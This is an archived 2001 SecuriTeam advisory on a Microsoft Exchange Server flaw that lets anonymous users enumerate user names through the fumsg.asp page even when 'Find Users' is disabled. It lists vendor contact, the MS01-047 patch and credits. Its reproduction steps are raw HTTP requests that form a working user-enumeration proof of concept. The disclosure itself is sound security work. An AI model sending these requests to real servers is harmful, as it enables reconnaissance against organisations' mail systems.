The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com SUMMARY Microsoft Exchange Server handles anonymous access to its Public Folders insecurely. While administrators may disable the "Find Users" features to prevent anonymous users from enumerating existing user names, a security flaw in Exchange server allows remote attackers with access to the exchange server to run "Find Users". DETAILS Microsoft Exchange's Public Folders options of "Find Users" can be disabled. This, however, does not prevent the users from directly accessing the ASP page (fumsg.asp). The link to the "Find Users" will be hidden, however it is still possible to programmatically access the page. Steps to recreate: 1) Contact: GET /exchange/root.asp?acs=anon HTTP/1.1 Host: www.example.com 2) Access the redirected page, and resend the issued cookie. GET /exchange/logonfrm.asp HTTP/1.1 Host: www.example.com Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN 3) Access the redirected page, and resend the issued cookie. GET /exchange/root.asp?acs=anon HTTP/1.1 Host: www.example.com Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN 4) Issue this request to obtain a list of users with the letter 'a' in their name (e.g. Administrator) POST /exchange/finduser/fumsg.asp HTTP/1.1 Host: www.example.com Accept: */* Content-Type: application/x-www-form-urlencoded Content-Length: 44 Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO= Vendor status: Microsoft has been contacted on August 4, 2001. A security bulletin was released on September 7, 2001. Solution: Microsoft has released a patch for this problem. See <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secu rity/bulletin/MS01-047.asp> Microsoft Security Bulletin MS01-047 for more information. ADDITIONAL INFORMATION This security hole was discovered by <mailto:noamrat_private> Noam Rathaus. The information has been provided by <mailto:expertsat_private> SecuriTeam Experts. ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 08:53:07 PDT